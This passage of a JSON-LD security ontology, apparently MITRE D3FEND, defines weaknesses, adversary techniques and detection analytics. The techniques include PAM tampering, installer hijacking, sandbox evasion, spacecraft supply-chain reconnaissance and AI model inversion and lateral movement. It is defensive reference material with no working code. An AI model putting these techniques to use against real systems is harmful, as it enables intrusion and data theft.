          "@id": "_:Nd6fd159474214baa9946959ce1bc1fe9"
        }
      ]
    },
    {
      "@id": "_:Nd6fd159474214baa9946959ce1bc1fe9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0005"
      }
    },
    {
      "@id": "d3f:CWE-195",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-195",
      "d3f:definition": "The product uses a signed primitive and performs a cast to an unsigned primitive, which can produce an unexpected value if the value of the signed primitive can not be represented using an unsigned primitive.",
      "rdfs:label": "Signed to Unsigned Conversion Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-681"
      }
    },
    {
      "@id": "d3f:LocalAreaNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Intranet local area network (LAN) traffic is network traffic that does not cross a given network's boundaries; where that network is defined as a LAN.",
      "rdfs:label": "Local Area Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Intranet"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:UserAccountMFADisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where multi-factor authentication (MFA) is disabled for a user account.",
      "rdfs:label": "User Account MFA Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:Nf1050bf5cec241be9168c6bb5f15197f"
        }
      ]
    },
    {
      "@id": "_:Nf1050bf5cec241be9168c6bb5f15197f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountMFAEnableEvent"
      }
    },
    {
      "@id": "d3f:Model-freeReinforcementLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MFRL",
      "d3f:definition": "In reinforcement learning (RL), a model-free algorithm (as opposed to a model-based one) is an algorithm which does not use the transition probability distribution (and the reward function) associated with the Markov decision process (MDP),which, in RL, represents the problem to be solved. The transition probability distribution (or transition model) and the reward function are often collectively called the \"model\" of the environment (or MDP), hence the name \"model-free\". A model-free RL algorithm can be thought of as an \"explicit\" trial-and-error algorithm. An example of a model-free algorithm is Q-learning.",
      "d3f:kb-article": "## References\nModel-free (reinforcement learning). Wikipedia. [Link](https://en.wikipedia.org/wiki/Model-free_(reinforcement_learning)).)",
      "rdfs:label": "Model-free Reinforcement Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:ReinforcementLearning"
      }
    },
    {
      "@id": "d3f:OTChangeControlProgramCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a remote device to modify an existing control program.",
      "d3f:modifies": {
        "@id": "d3f:OTControlProgram"
      },
      "rdfs:comment": "GE-SRTP: WRITE PROGRAM BLOCK MEMORY\nGE-SRTP: CHANGE PLC CPU PRIVILEGE LEVEL\nGE-SRTP: SET CONTROL ID(CPU ID)\nGE-SRTP: PROGRAM STORE (UPLOAD FROM PLC)\nGE-SRTP: PROGRAM LOAD (DOWNLOAD TO PLC)\nGE-SRTP: TOGGLE FORCE SYSTEM MEMORY",
      "rdfs:label": "OT Change Control Program Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommand"
        },
        {
          "@id": "_:Nc4f98cc934994dc18edb13952ce74626"
        }
      ]
    },
    {
      "@id": "_:Nc4f98cc934994dc18edb13952ce74626",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "d3f:WindowsRegistryValueGetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the data of a registry value is retrieved, typically to read its configuration or state.",
      "rdfs:label": "Windows Registry Value Get Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryValueEvent"
        },
        {
          "@id": "_:N2723865a4d7f4024aa621f5494220ae5"
        }
      ]
    },
    {
      "@id": "_:N2723865a4d7f4024aa621f5494220ae5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryValueSetEvent"
      }
    },
    {
      "@id": "d3f:T1564.014",
      "@type": "owl:Class",
      "d3f:attack-id": "T1564.014",
      "d3f:definition": "Adversaries may abuse extended attributes (xattrs) on macOS and Linux to hide their malicious data in order to evade detection. Extended attributes are key-value pairs of file and directory metadata used by both macOS and Linux. They are not visible through standard tools like `Finder`,  `ls`, or `cat` and require utilities such as `xattr` (macOS) or `getfattr` (Linux) for inspection. Operating systems and applications use xattrs for tagging, integrity checks, and access control. On Linux, xattrs are organized into namespaces such as `user.` (user permissions), `trusted.` (root permissions), `security.`, and `system.`, each with specific permissions. On macOS, xattrs are flat strings without namespace prefixes, commonly prefixed with `com.apple.*` (e.g., `com.apple.quarantine`, `com.apple.metadata:_kMDItemUserTags`) and used by system features like Gatekeeper and Spotlight.(Citation: Establishing persistence using extended attributes on Linux)",
      "rdfs:label": "Extended Attributes",
      "rdfs:subClassOf": {
        "@id": "d3f:T1564"
      }
    },
    {
      "@id": "d3f:CWE-594",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-594",
      "d3f:definition": "When the J2EE container attempts to write unserializable objects to disk there is no guarantee that the process will complete successfully.",
      "rdfs:label": "J2EE Framework: Saving Unserializable Objects to Disk",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1076"
        },
        {
          "@id": "d3f:CWE-710"
        }
      ]
    },
    {
      "@id": "d3f:MovingAverageModel",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MAM",
      "d3f:definition": "the moving-average model (MA model) is an approach for modeling univariate time series and specifies that the output variable is cross-correlated with a non-identical to itself random-variable.",
      "d3f:kb-article": "## Refrences\nWikipedia. (n.d.). Moving average model. [Link](https://en.wikipedia.org/wiki/Moving_average_model)",
      "d3f:synonym": "MA Model",
      "rdfs:label": "Moving Average Model",
      "rdfs:subClassOf": {
        "@id": "d3f:TimeSeriesAnalysis"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForScanningRemoteServicesToLocateStoredObjectsWithMalware",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US11368475B1/"
      },
      "d3f:kb-abstract": "A system and method for retrieval and analysis of stored objects for malware is described. The method involves receiving a scan request message from a customer to conduct analytics on one or more objects stored within a third-party controlled service. In response to receipt of the scan request message, the system generates a redirect message. The redirect message redirects the customer to an authentication portal of the third-party controlled service operating as a logon page and configures receipt by the system of access credentials for the third-party controlled service upon verification of the customer. Using the access credentials, the system is able to retrieve the one or more objects using the access credentials and performing analytics on each object of the one or more objects to classify each object as malicious or benign.",
      "d3f:kb-author": "Sai Vashisht",
      "d3f:kb-organization": "Mandiant Inc, FireEye Security Holdings US LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:EmailRemoval"
      },
      "d3f:kb-reference-title": "System and method for scanning remote services to locate stored objects with malware",
      "rdfs:label": "Reference - System and method for scanning remote services to locate stored objects with malware"
    },
    {
      "@id": "d3f:ParticleRadiationHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ParticleRadiationHardening"
      ],
      "d3f:definition": "The application of material, process, layout, or circuit-level design measures to electronic systems and components to reduce susceptibility to total ionizing dose degradation and single-event effects caused by ionizing particles such as protons, heavy ions, neutrons, or electrons.",
      "d3f:synonym": "Ionizing Particle Hardening",
      "rdfs:isDefinedBy": {
        "@id": "https://www.mdpi.com/2079-9292/10/17/2144"
      },
      "rdfs:label": "Particle Radiation Hardening",
      "rdfs:subClassOf": {
        "@id": "d3f:RadiationHardening"
      }
    },
    {
      "@id": "d3f:WindowsNtCreateProcessEx",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtCreateProcessEx",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateProcess"
      }
    },
    {
      "@id": "d3f:REC-0008.04",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0008.04",
      "d3f:definition": "Threat actors map contractual and operational relationships to identify the weakest well-connected node. They enumerate primes and subs (bus, payload, ground, launch), managed service providers, ground-network operators, cloud/SaaS tenants, testing and calibration labs, logistics and customs brokers, and warranty/repair depots, plus who holds remote access, who moves money, and who approves changes. Public artifacts (press releases, procurement records, org charts, job postings, conference bios) and technical traces (email MX/DMARC, shared SSO/IdP providers, cross-domain service accounts) reveal trust bridges between enclaves. Shipment paths and integration schedules expose when and where hardware and sensitive data concentrate. Understanding these ties enables tailored phishing, invoice fraud, credential reuse, and supply-chain insertion timed to integration milestones.",
      "rdfs:label": "Business Relationships - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0008/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0008"
      },
      "skos:prefLabel": "Business Relationships"
    },
    {
      "@id": "d3f:T1591.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1591.001",
      "d3f:definition": "Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.",
      "rdfs:label": "Determine Physical Locations",
      "rdfs:subClassOf": {
        "@id": "d3f:T1591"
      }
    },
    {
      "@id": "d3f:T1578",
      "@type": "owl:Class",
      "d3f:attack-id": "T1578",
      "d3f:definition": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.",
      "rdfs:label": "Modify Cloud Compute Infrastructure",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1497.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1497.003",
      "d3f:definition": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.",
      "d3f:may-invoke": {
        "@id": "d3f:GetSystemTime"
      },
      "d3f:may-run": {
        "@id": "d3f:SystemTimeApplication"
      },
      "rdfs:label": "Time Based Checks",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1497"
        },
        {
          "@id": "_:Nc50dbfe264024e199d89e36080ede045"
        },
        {
          "@id": "_:Ne3360bd200a5421d9452aa762d373f64"
        }
      ]
    },
    {
      "@id": "_:Nc50dbfe264024e199d89e36080ede045",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetSystemTime"
      }
    },
    {
      "@id": "_:Ne3360bd200a5421d9452aa762d373f64",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-run"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemTimeApplication"
      }
    },
    {
      "@id": "wptmp:entity#Reference%20-%20DNS%20Whitelist%20(DNSWL)%20Email%20Authentication%20Method%20Extension",
      "d3f:kb-author": "Alessandro Vesely"
    },
    {
      "@id": "d3f:CCI-002475_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to prevent unauthorized modification of organization-defined information at rest on organization-defined information system components.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002475"
    },
    {
      "@id": "d3f:T1574.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.005",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.",
      "d3f:modifies": {
        "@id": "d3f:ServiceApplication"
      },
      "rdfs:label": "Executable Installer File Permissions Weakness",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:N4136d94605af499792f6659c0dc1de4f"
        }
      ]
    },
    {
      "@id": "_:N4136d94605af499792f6659c0dc1de4f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:InternetBasedAttacker",
      "@type": "owl:Class",
      "d3f:definition": "A remote attacker who leverages the internet to conduct attacks, such as through phishing, malware, or direct network attacks.",
      "rdfs:label": "Internet-based Attacker",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RemoteAttacker"
        },
        {
          "@id": "_:N8df757447bdc4d3d96bc8eeeee929b1c"
        }
      ]
    },
    {
      "@id": "_:N8df757447bdc4d3d96bc8eeeee929b1c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WideAreaNetwork"
      }
    },
    {
      "@id": "d3f:HTTPEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Hypertext Transfer Protocol (HTTP), which operates over TCP to transmit hypermedia documents.",
      "rdfs:label": "HTTP Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/http_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "d3f:TCPEvent"
        },
        {
          "@id": "_:N16d98d16f23d4d94bff40df8a22998e7"
        }
      ]
    },
    {
      "@id": "_:N16d98d16f23d4d94bff40df8a22998e7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebNetworkTraffic"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2014-11-007-RemoteWindowsManagementInstrumentation_WMI_OverRPC_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": ""
      },
      "d3f:kb-abstract": "As described in ATT&CK, an adversary can use Windows Management Instrumentation (WMI) to view or manipulate objects on a remote host. It can be used to remotely edit configuration, start services, query files, and anything that can be done with a WMI class. When remote WMI requests are over RPC (CAR-2014-05-001), it connects to a DCOM interface within the RPC group netsvcs. To detect this activity, a sensor is needed at the network level that can decode RPC traffic or on the host where the communication can be detected more natively, such as Event Tracing for Windows. Using wireshark/tshark decoders, the WMI interfaces can be extracted so that WMI activity over RPC can be detected.\n\nAlthough the description details how to detect remote WMI precisely, a decent estimate has been to look for the string RPCSS within the initial RPC connection on 135/tcp. It returns a superset of this activity, and will trigger on all DCOM-related services running within RPC, which is likely to also be activity that should be detected between hosts. More about RPCSS at : rpcss_dcom_interfaces.html",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:RPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-11-007: Remote Windows Management Instrumentation (WMI) over RPC",
      "rdfs:label": "Reference - CAR-2014-11-007: Remote Windows Management Instrumentation (WMI) over RPC - MITRE"
    },
    {
      "@id": "d3f:AML.TA0015",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0015",
      "d3f:definition": "The adversary is trying to move through your AI environment.\n\nLateral Movement consists of techniques that adversaries may use to gain access to and control other systems or components in the environment. Adversaries may pivot towards AI Ops infrastructure such as model registries, experiment trackers, vector databases, notebooks, or training pipelines. As the adversary moves through the environment, they may discover means of accessing additional AI-related tools, services, or applications. AI agents may also be a valuable target as they commonly have more permissions than standard user accounts on the system.",
      "rdfs:label": "Lateral Movement - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0015"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Lateral Movement"
    },
    {
      "@id": "d3f:CCI-002740_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to authenticate organization-defined software or firmware components prior to installation.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableAllowlisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002740"
    },
    {
      "@id": "d3f:CWE-669",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-669",
      "d3f:definition": "The product does not properly transfer a resource/behavior to another sphere, or improperly imports a resource/behavior from another sphere, in a manner that provides unintended control over that resource.",
      "rdfs:label": "Incorrect Resource Transfer Between Spheres",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CCI-001127_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects the integrity of transmitted information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001127"
    },
    {
      "@id": "d3f:CCI-000143_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides a warning when allocated audit record storage volume reaches an organization-defined percentage of maximum audit record storage capacity.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemDaemonMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-20T00:00:00"
      },
      "rdfs:label": "CCI-000143"
    },
    {
      "@id": "d3f:T1556.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1556.003",
      "d3f:definition": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)",
      "d3f:may-modify": [
        {
          "@id": "d3f:OperatingSystemConfigurationFile"
        },
        {
          "@id": "d3f:OperatingSystemSharedLibraryFile"
        }
      ],
      "rdfs:label": "Pluggable Authentication Modules",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1556"
        },
        {
          "@id": "_:N9429c7e10fdc4f3b86d767c613435be3"
        },
        {
          "@id": "_:Nfcf32dfc57bb455fb4c9eb53e21fa7e9"
        }
      ]
    },
    {
      "@id": "_:N9429c7e10fdc4f3b86d767c613435be3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationFile"
      }
    },
    {
      "@id": "_:Nfcf32dfc57bb455fb4c9eb53e21fa7e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemSharedLibraryFile"
      }
    },
    {
      "@id": "d3f:Skewness",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SKE",
      "d3f:definition": "Skewness is a measure of the asymmetry of the probability distribution of a real-valued random variable about its mean. It is a standardized moment of a probability distribution function.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Skewness. [Link](https://en.wikipedia.org/wiki/Skewness)",
      "rdfs:label": "Skewness",
      "rdfs:subClassOf": {
        "@id": "d3f:DistributionProperties"
      }
    },
    {
      "@id": "d3f:AML.T0024.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0024.001",
      "d3f:definition": "AI models' training data could be reconstructed by exploiting the confidence scores that are available via an inference API.\nBy querying the inference API strategically, adversaries can back out potentially private information embedded within the training data.\nThis could lead to privacy violations if the attacker can reconstruct the data of sensitive features used in the algorithm.",
      "rdfs:label": "Invert AI Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0024.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0024"
      },
      "skos:prefLabel": "Invert AI Model"
    },
    {
      "@id": "d3f:ExecutableFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Subroutine"
      },
      "d3f:definition": "In computing, executable code or an executable file or executable program, sometimes simply an executable, causes a computer \"to perform indicated tasks according to encoded instructions,\" as opposed to a data file that must be parsed by a program to be meaningful. These instructions are traditionally machine code instructions for a physical CPU. However, in a more general sense, a file containing instructions (such as bytecode) for a software interpreter may also be considered executable; even a scripting language source file may therefore be considered executable in this sense. The exact interpretation depends upon the use; while the term often refers only to machine code files, in the context of protection against computer viruses all files which cause potentially hazardous instruction execution, including scripts, are lumped together for convenience.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Executable"
      },
      "rdfs:label": "Executable File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:Ne5b5c09cfa744a7c964f638e3d3ab51b"
        }
      ],
      "skos:altLabel": "Executable"
    },
    {
      "@id": "_:Ne5b5c09cfa744a7c964f638e3d3ab51b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:T1564.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.003",
      "d3f:definition": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.",
      "d3f:may-modify": [
        {
          "@id": "d3f:PropertyListFile"
        },
        {
          "@id": "d3f:SystemConfigurationDatabase"
        }
      ],
      "rdfs:label": "Hidden Window",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N0d6107a72e064312a496fe7f3d8e2f01"
        },
        {
          "@id": "_:Ncc6bf8be311f4822aa94602a44f4ebac"
        }
      ]
    },
    {
      "@id": "_:N0d6107a72e064312a496fe7f3d8e2f01",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PropertyListFile"
      }
    },
    {
      "@id": "_:Ncc6bf8be311f4822aa94602a44f4ebac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:REC-0003.01",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0003.01",
      "d3f:definition": "Adversaries inventory space and ground RF equipment to infer capabilities, limits, and attack surfaces. On the spacecraft, they seek antenna type and geometry, placement and boresight constraints, polarization, RF front-end chains, transponder type, translation factors, gain control, saturation points, and protective features. On the ground, they collect dish size/aperture efficiency, feed/polarizer configuration, tracking modes, diversity sites, and backend modem settings. Beacon frequency/structure, telemetry signal type, symbol rates, and framing reveal demodulator parameters and help an actor build compatible SDR pipelines. Knowledge of power budgets and AGC behavior enables strategies to push hardware into non-linear regimes, causing self-inflicted denial or intermodulation. Equipment location and mounting inform visibility and interference opportunities.",
      "rdfs:label": "Communications Equipment - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0003/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0003"
      },
      "skos:prefLabel": "Communications Equipment"
    },
    {
      "@id": "d3f:WebServerApplication",
      "@type": "owl:Class",
      "d3f:definition": "A web server application handles HTTP requests from clients, serves static content, and may act as a reverse proxy or load balancer.",
      "rdfs:label": "Web Server Application",
      "rdfs:subClassOf": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:RemovableMediaDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A removable media device is a hardware device used for computer storage and that is designed to be inserted and removed from the system.  It is distinct from other removable media in that all the hardware required to read the data are built into the device.  So USB flash drives and external hard drives are removable media devices, whereas tapes and disks are not, as they require additional hardware to perform read/write operations.",
      "rdfs:label": "Removable Media Device",
      "rdfs:seeAlso": {
        "@id": "dbr:Removable_media"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:Prolog",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PRO",
      "d3f:definition": "Prolog has its roots in first-order logic, a formal logic, and unlike many other programming languages, it is intended primarily as a declarative programming language.",
      "d3f:kb-article": "## How it works\nProlog is intended primarily as a declarative programming language: the program logic is expressed in terms of relations, represented as facts and rules. A computation is initiated by running a query over these relations.\n\n## References\n1. Prolog. (2023, April 5). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Prolog)",
      "rdfs:label": "Prolog",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicProgramming"
      }
    },
    {
      "@id": "d3f:AML.TA0005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0005",
      "d3f:definition": "The adversary is trying to run malicious code embedded in AI artifacts or software.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system.\nTechniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data.\nFor example, an adversary might use a remote access tool to run a PowerShell script that does [Remote System Discovery](https://attack.mitre.org/techniques/T1018/).",
      "rdfs:label": "Execution - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0005"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Execution"
    },
    {
      "@id": "d3f:confidence",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": "confidence",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-001%3AAttemptToAddCertificateToUntrustedStore_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-001/"
      },
      "d3f:kb-abstract": "Adversaries may add their own root certificate to the certificate store, to cause the web browser to trust that certificate and not display a security warning when it encounters the previously unseen certificate. This action may be the precursor to malicious activity.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-001: Attempt To Add Certificate To Untrusted Store",
      "rdfs:label": "Reference - CAR-2021-05-001: Attempt To Add Certificate To Untrusted Store - MITRE"
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-010%3ACMSTP_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-010/"
      },
      "d3f:kb-abstract": "CMSTP.exe is the Microsoft Connection Manager Profile Installer, which can be leveraged to set up listeners that will receive and install malware from remote sources in a trusted fashion. When CMSTP.exe is seen in combination with an external connection, it is a good indication of this TTP.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-010: CMSTP",
